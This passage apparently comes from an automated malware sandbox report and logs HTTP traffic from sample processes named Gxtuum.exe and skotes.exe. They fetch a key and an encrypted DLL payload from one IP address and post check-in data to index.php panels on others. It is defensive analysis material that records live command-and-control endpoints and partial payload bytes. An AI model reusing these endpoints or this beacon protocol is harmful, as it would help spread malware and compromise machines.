                                                                                                                                                                                                                                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                                              User-Agent: 1
                                                                                                                                                                                                                                                              Host: 185.156.73.23
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:15.639784098 CET204INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:15 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                              Content-Length: 1
                                                                                                                                                                                                                                                              Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Data Raw: 30
                                                                                                                                                                                                                                                              Data Ascii: 0
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:15.698951960 CET388OUTGET /dll/key HTTP/1.1
                                                                                                                                                                                                                                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                                              User-Agent: 1
                                                                                                                                                                                                                                                              Host: 185.156.73.23
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:16.173317909 CET224INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:15 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                              Content-Length: 21
                                                                                                                                                                                                                                                              Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Data Raw: 39 74 4b 69 4b 33 62 73 59 6d 34 66 4d 75 4b 34 37 50 6b 33 73
                                                                                                                                                                                                                                                              Data Ascii: 9tKiK3bsYm4fMuK47Pk3s
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:16.526710033 CET393OUTGET /dll/download HTTP/1.1
                                                                                                                                                                                                                                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                                              User-Agent: 1
                                                                                                                                                                                                                                                              Host: 185.156.73.23
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:17.083144903 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:16 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                              Content-Disposition: attachment; filename="fuckingdllENCR.dll";
                                                                                                                                                                                                                                                              Content-Length: 97296
                                                                                                                                                                                                                                                              Keep-Alive: timeout=5, max=98
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                                                                              Data Raw: 58 4d 20 a9 34 49 68 99 fe 5d 0a b3 eb 74 b6 26 d0 73 db 11 cf 76 c9 30 7b 06 76 1e 76 73 27 c0 ad eb 3a aa 6c ec 68 b4 13 95 65 19 c0 04 a4 9f 52 d6 da b1 8e f9 31 83 b8 06 72 fc 52 2b 46 6b 2a f7 94 87 96 7e f9 73 f3 a2 8e 06 fa 0b c3 51 a1 b1 0b 1e e4 72 c9 54 ac 62 d5 ed 06 c7 96 dd b1 7e 63 b2 8d 5b 1d 87 0b cf 81 a3 a5 ba ba 3b a3 fc ff 6a ac 40 e8 30 b2 25 84 88 f9 dd 19 78 dd e8 c7 76 cb 77 fb f0 2e a7 1d 3c 72 75 0a 1c 17 d3 59 72 65 3b f4 62 36 1d 14 b2 48 51 2d d4 ec ba cd 38 bf 42 b3 9b 51 82 61 a1 c0 c6 52 bc 3a cc 68 26 72 90 a0 a6 17 be fc 07 3d a2 3b 72 1e 6b e2 0b 54 e2 40 e0 ea b9 d0 e1 6c 8b cf 3b 23 fd 94 33 21 e6 4f b4 00 78 da 7d a1 13 e8 b9 03 f4 00 bb ce 79 27 3c 0a 47 66 51 90 4b af 23 d8 4c 35 76 10 1e 5d d4 b3 01 f6 db 8a 1e 18 de 64 f3 a6 e9 b9 b8 cb fe 4e 7b 65 a0 c7 bc 40 05 fa f3 1e a1 c2 e7 7f 08 cd ec 7f e9 a4 1b b2 f5 41 5c 8e 11 3c bc 74 f3 75 ed 58 15 4f ef 6e c5 e9 5a 89 8e 20 86 58 62 b1 4f 3c 84 2a 5a a5 a4 cf 68 7e 9b 28 b1 57 99 66 af 7a 0d 56 cb 34 09 db 4c [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: XM 4Ih]t&sv0{vvs':lheR1rR+Fk*~sQrTb~c[;j@0%xvw.<ruYre;b6HQ-8BQaR:h&r=;rkT@l;#3!Ox}y'<GfQK#L5v]dN{e@A\<tuXOnZ XbO<*Zh~(WfzV4L%50H`syB(IL5s:aS}XM9Jo)'M;n6]Wn)L_e>[RA.'6N.g6IY%h 3r^\b~y/h2ZLku}V<fbD<!_2zoIEP*OuPw#6N&lR}GILYNyzjHy'_5Pd9y+6q*)GcL#5\M5U])U(~HmYG1r4BhP]iM%)q.]~|jbK!N7R}T2bsq1L^!|qD'sLnD@bn%0=bQ1+lQXO|NC.d{08F<Wy{oj3n4eS] KoBH~sh1m86{lsRq~w_;X*#U
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:17.083183050 CET1236INData Raw: 98 ce 36 6e 99 4f 44 62 54 a0 2b 5a 63 96 17 1c 8e 71 d6 10 c5 90 ce 53 f1 24 2d 53 60 59 54 cc 01 e7 c4 70 93 60 32 41 18 ce 0d 55 c7 24 07 69 64 06 3a b3 b0 e0 76 6e 84 3b d8 aa e7 9e f0 d5 ee 45 9c b1 50 a7 0a df 3f 11 c8 6e 7d 41 c9 76 d2 0f
                                                                                                                                                                                                                                                              Data Ascii: 6nODbT+ZcqS$-S`YTp`2AU$id:vn;EP?n}AvLwU|}"Gi9ZIxw.sY-KnP2oWci#2kgDZ6~,o9"opx(uccgv@M)nL
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:17.083219051 CET448INData Raw: 44 70 21 ac fa dd 10 12 6c 8f df 8d 2a 52 37 0a bc 2b 32 e0 ca d2 85 4a 5e 2a bb 89 27 6f b7 ed ec 11 16 da 35 88 e8 c7 a0 fb 57 12 bc ee 7b 8e 20 56 98 d0 5f d5 fa 6e b8 a6 bb 07 ab 54 57 ec 21 3a 2e 06 6d 3f c9 25 6c 63 ce e7 5a 5e c2 32 24 bd
                                                                                                                                                                                                                                                              Data Ascii: Dp!l*R7+2J^*'o5W{ V_nTW!:.m?%lcZ^2$2[#LeCe+: *rUz(-dFI?[*VH0-!{</Bge!ygJZ=XwPMeh5]Bki'\L4u
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:17.083311081 CET1236INData Raw: 94 56 6f 92 44 df 99 d0 e2 07 87 22 38 2a d1 8d 6b 3b c8 f7 e1 b5 00 e9 38 74 ca 24 b7 c2 3f 88 77 ac 79 7e 4b f0 5e 79 57 bd f5 65 c6 f8 b8 fd c0 5d 9c 70 37 a5 45 ab 76 ba a0 33 8b ee 99 a3 da 61 9a 35 1f f1 31 09 03 71 96 d5 28 76 57 11 9e 5e
                                                                                                                                                                                                                                                              Data Ascii: VoD"8*k;8t$?wy~K^yWe]p7Ev3a51q(vW^RK@$V+4trcwMMZoj^}xmgu0f'US]*04<cMk2cD$g|5r_gqKgLoZ
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:17.083360910 CET1236INData Raw: 58 c0 cb 65 40 62 96 d2 c0 5a b0 40 d6 25 d6 ca ea 81 87 4f 4f 97 dc 41 ef 2a 66 64 06 53 6d 2a 3f d8 44 59 af 7a 70 c9 ee 8f c8 c1 db 27 48 69 d8 e7 8e c2 56 b7 01 bc 0b 63 45 c8 b6 b5 e2 1a ee a7 1a fe a7 05 65 86 dc c4 60 f9 00 38 79 10 46 0b
                                                                                                                                                                                                                                                              Data Ascii: Xe@bZ@%OOA*fdSm*?DYzp'HiVcEe`8yF|G(^80y-`p+x@Q.QjK=s3GVBfP:}^-RuJhJHz#<6S}Cc*>:cNZNG1M4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:17.083396912 CET1236INData Raw: 97 c8 49 60 d1 46 16 fc 9d 61 11 37 f4 93 5e ed 32 7a c7 3b 41 14 16 b7 4f 84 8d 39 ca 79 46 fc 2f a4 a6 82 f3 b6 68 61 61 41 32 66 02 00 57 51 d9 b9 0a 9a 35 e2 01 f6 64 48 f1 ee 15 5c 2f c3 ce e2 74 99 ad e8 49 c0 49 83 58 d9 d9 5f 15 11 8a 28
                                                                                                                                                                                                                                                              Data Ascii: I`Fa7^2z;AO9yF/haaA2fWQ5dH\/tIIX_( N%"PPLT(yFqG=)hZX.`2RsbifK!97e9f|uUsetj9L~DY)5:w<}gBO$5)iI
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:17.083432913 CET1236INData Raw: bd fe 32 26 39 43 46 ac 46 98 3a a9 90 2f db c5 e7 08 95 6c c4 71 43 67 26 21 a1 8e e2 57 01 bf 17 eb ec 95 38 79 19 72 66 f5 b3 f7 1b 75 10 9d 34 6d e2 d0 9a 09 6a 6b 6e fb a0 1b a0 0c 89 8d 39 0d 7b 82 10 1c fb a1 a0 b6 fb 0b bd 91 68 87 0f bc
                                                                                                                                                                                                                                                              Data Ascii: 2&9CFF:/lqCg&!W8yrfu4mjkn9{h`e\lrp<wW+:s_m]sad8t43g\]Dh-@H<|jSWU@E/]-L[uNIhq8~'??y9<N5)g.AK2T
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:17.083729982 CET896INData Raw: 9c 93 85 55 4b b0 90 0f 56 82 0c 86 f6 cc 27 8b b1 b8 1f 77 0d b6 88 24 2a 38 27 bc 8c 03 45 5b 5b 2b 90 a7 9b 51 a3 04 60 88 c5 2c 4a 7a 88 0a 01 7d 0c 2e 87 47 cf 80 8f 5e 70 62 4c d5 ad ce bf 64 f2 8f 59 f3 8f 0c c9 92 4f 19 2f 5b b6 f8 01 87
                                                                                                                                                                                                                                                              Data Ascii: UKV'w$*8'E[[+Q`,Jz}.G^pbLdYO/[)o319Xz&k(pB~IjB1aNG^L/QAD!B5F$%RkQzo):z4fJnpb7[w\n@hm,tsY!FZ*b[.LJT/
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:17.086100101 CET1236INData Raw: 34 ba a9 d6 80 6d a5 ac 9f d3 80 17 6f 02 df fe 4e 07 6d 30 c4 90 a4 8c 39 6b a3 a1 85 ab b3 ca 01 2d d7 3a ac 7a 54 7a bd ef a4 a1 a0 91 1e 78 f5 95 ac ec 47 63 7c 55 62 3c 14 a6 7c 59 c1 c9 3e 15 2e 8a 92 0f cc 20 54 75 23 66 b3 9f f4 b5 a1 18
                                                                                                                                                                                                                                                              Data Ascii: 4moNm09k-:zTzxGc|Ub<|Y>. Tu#f-UM!+g@!4<fG7IkEl#=Jdr;)\b?kkdx-<lO!2NY!8hiq[Awyw:uw%}i=M
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:17.086235046 CET1236INData Raw: fe a0 6e c3 63 7d 51 4a 88 34 c1 3b 5b 72 7c c8 f4 ed 5e 10 25 3c 74 a5 0c fe e8 35 f9 53 85 b0 7f 5b 8f 02 41 49 61 2b a3 94 34 38 d7 d1 ef ab dc af 94 18 2a 85 ec 78 08 a4 e3 07 00 19 9d a2 73 33 c8 b1 30 ca 10 53 df b9 78 4e 9a 81 9d ef 5a b3
                                                                                                                                                                                                                                                              Data Ascii: nc}QJ4;[r|^%<t5S[AIa+48*xs30SxNZCPH3U"~6GxeZE3 SZF&=Qt`d^usB53m3>g\REmge]PxofXd"JP, XU@po5a^
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:17.094532013 CET1236INData Raw: 7c dc f5 13 f0 20 79 96 b6 dc 70 60 b0 aa d7 99 89 79 7a 6c 53 96 6e a0 0b 0a f6 69 a5 56 4e eb be f5 a3 28 42 76 7d a0 af 99 3a 94 58 e7 16 a3 0d b0 73 4f 9a 66 2e c2 7e 7a 9a 14 12 fb 54 81 6f bd 0e 58 38 95 18 6e 20 4b 24 d8 d5 3a 44 1d 36 82
                                                                                                                                                                                                                                                              Data Ascii: | yp`yzlSniVN(Bv}:XsOf.~zToX8n K$:D6Z%NNng=t+L~6DtFX[a/[m[CK`<s%ICz TAy^}`dj[a9>AD&MoU$]Q,VSvD
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:17.633654118 CET395OUTGET /files/download HTTP/1.1
                                                                                                                                                                                                                                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                                              User-Agent: C
                                                                                                                                                                                                                                                              Host: 185.156.73.23
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:18.116525888 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:17 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                              Content-Length: 1
                                                                                                                                                                                                                                                              Keep-Alive: timeout=5, max=97
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Data Raw: 30
                                                                                                                                                                                                                                                              Data Ascii: 0
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:20.189466000 CET395OUTGET /files/download HTTP/1.1
                                                                                                                                                                                                                                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                                              User-Agent: C
                                                                                                                                                                                                                                                              Host: 185.156.73.23
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:20.674818993 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:20 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                              Content-Length: 1
                                                                                                                                                                                                                                                              Keep-Alive: timeout=5, max=96
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Data Raw: 30
                                                                                                                                                                                                                                                              Data Ascii: 0
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:23.021264076 CET395OUTGET /files/download HTTP/1.1
                                                                                                                                                                                                                                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                                              User-Agent: C
                                                                                                                                                                                                                                                              Host: 185.156.73.23
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:23.505983114 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:23 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                              Content-Length: 1
                                                                                                                                                                                                                                                              Keep-Alive: timeout=5, max=95
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Data Raw: 30
                                                                                                                                                                                                                                                              Data Ascii: 0
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:25.750762939 CET395OUTGET /files/download HTTP/1.1
                                                                                                                                                                                                                                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                                              User-Agent: C
                                                                                                                                                                                                                                                              Host: 185.156.73.23
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:26.235935926 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:25 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                              Content-Length: 1
                                                                                                                                                                                                                                                              Keep-Alive: timeout=5, max=94
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Data Raw: 30
                                                                                                                                                                                                                                                              Data Ascii: 0
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:28.917133093 CET395OUTGET /files/download HTTP/1.1
                                                                                                                                                                                                                                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                                              User-Agent: C
                                                                                                                                                                                                                                                              Host: 185.156.73.23
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:29.403192997 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:29 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                              Content-Length: 1
                                                                                                                                                                                                                                                              Keep-Alive: timeout=5, max=93
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Data Raw: 30
                                                                                                                                                                                                                                                              Data Ascii: 0
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:31.635219097 CET395OUTGET /files/download HTTP/1.1
                                                                                                                                                                                                                                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                                              User-Agent: C
                                                                                                                                                                                                                                                              Host: 185.156.73.23
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:32.137281895 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:31 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                              Content-Length: 1
                                                                                                                                                                                                                                                              Keep-Alive: timeout=5, max=92
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Data Raw: 30
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              62192.168.2.450133212.193.31.8805172C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:14.613398075 CET160OUTPOST /3ofn3jf3e2ljk2/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 212.193.31.8
                                                                                                                                                                                                                                                              Content-Length: 4
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                              Data Ascii: st=s
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:15.949302912 CET155INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:15 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                                                                                                              Data Ascii: <c>3<d>


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              63192.168.2.450137185.215.113.43802472C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:17.151326895 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                                                                                              Content-Length: 4
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                              Data Ascii: st=s
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:18.478761911 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:18 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 1 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              64192.168.2.450139212.193.31.8805172C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:17.594305992 CET312OUTPOST /3ofn3jf3e2ljk2/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 212.193.31.8
                                                                                                                                                                                                                                                              Content-Length: 154
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33
                                                                                                                                                                                                                                                              Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:18.929651022 CET154INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:18 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                              Content-Length: 7
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                                                                                                              Data Ascii: <c><d>


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              65192.168.2.450142185.215.113.43802472C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:20.113603115 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                                                                                              Content-Length: 154
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:21.448656082 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:21 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              66192.168.2.450143212.193.31.8805172C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:21.084085941 CET160OUTPOST /3ofn3jf3e2ljk2/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 212.193.31.8
                                                                                                                                                                                                                                                              Content-Length: 4
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                              Data Ascii: st=s
